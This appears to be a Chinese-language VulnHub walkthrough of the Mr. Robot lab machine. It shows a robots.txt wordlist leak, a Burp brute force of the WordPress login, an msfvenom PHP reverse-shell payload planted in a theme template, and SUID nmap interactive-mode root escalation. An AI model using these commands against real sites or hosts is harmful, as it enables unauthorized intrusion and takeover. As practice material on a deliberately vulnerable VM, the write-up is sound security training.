這是vulnhub靶機系列文章的第六篇，本次主要知識點為：wordpress後臺編輯模板getshell，suid提權-nmap命令，話不多說，直接開始吧...

靶機下載地址：
https://www.vulnhub.com/entry/mr-robot-1,151/

#001 實驗環境（nat模式）

攻擊機：kali：192.168.136.129
靶機mrrobot：192.168.136.138

#002 實戰writeup

尋找靶機ip，查詢網絡卡中存活的主機，找到靶機ip：192.168.136.138

netdiscover -i eth0

掃描一下埠開放情況

nmap -T4 -A 192.168.136.138
 

發現開啟的埠少得可憐，訪問一下80埠，進入到一個挺酷的頁面，稍微玩了一會，發現沒有什麼利用的點，掃一下目錄看看，dirbuster，一看目錄就知道是wordpress的站點

用wpscan掃了一下，沒掃出使用者名稱，也沒看到什麼可利用的點，只能另找出路，找了一下目錄，實在是找不到利用的點了，去網上看了下大佬的文章，說可以利用license目錄，去看看，但是並沒找到密碼，還得另找出路，我把目光轉向了dic字典檔案

訪問一下robots.txt檔案，看下有什麼收穫，發現了一個字典和key檔案，訪問字典檔案後，提示下載，我就下載了下來

在想這裡面會不會就存著後臺登陸密碼，所以我用burp爆破一下後臺，使用者密碼都用這個字

Load載入一下剛才的字典進行爆破

爆破了一會就出現了長度不一樣的請求，單擊檢視

點選請求包檢視response，4161長度的響應結果是invalid username

再檢視4212長度的，使用者名稱為elliot的請求包，返回結果是密碼不對，所以確定使用者名稱為elliot

然後去改一下，把使用者名稱填正確的，只爆破密碼

爆破了一個世紀之後，總算是爆破出來了，使用者名稱：elliot 密碼：ER28-0652

利用爆破出來的賬號密碼登陸後臺，登陸成功

然後利用編輯模板反彈shell，生成msf反彈shell木馬php的

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.136.129 lport=6666 -f raw >/root/shell.php
 

然後複製木馬的內容，利用編輯模板getshell，我這裡選擇的是header.php的頁面

將木馬的內容插入模板中，點選下方的updatefile

Msf開啟監聽

訪問http://192.168.136.138:80/wp-content/themes/twentyfifteen/header.php，看到成功反彈了meterpreter會話

然後輸入shell，並利用python指令碼命令，轉換終端，檢視許可權，不是root，所以需要提權

#003 提權操作

嘗試一下用suid提權，

find / -user root -perm -4000 -print 2>/dev/null

發現竟然有nmap存在suid許可權

nmap -V 檢視版本，看是否可以利用，但是發現並不能執行，可能是當前使用者/usr/bin目錄下沒有

習慣性的進入到/home目錄下，ls檢視目錄，cd到robot目錄下，檢視目錄下的檔案，發現了robot的賬號和MD5加密的密碼，MD5解密到明文為abcdefghijklmnopqrstuvwxyz

su切換到robot使用者，看是否能執行nmap命令，成功了，果然是剛才的使用者執行不了

nmap版本(2.02—-5.2.1)都帶有互動模式，允許使用者執行shell命令，接下來利用這個提權

nmap --interactive    #進入到nmap的互動模式，
!sh    #獲取shell

提權成功

#004 總結歸納

robots.txt檔案的利用

配合burp爆破後臺

Wordpress後臺修改模板getshell姿勢+配合msf使用

Nmap的suid提權利用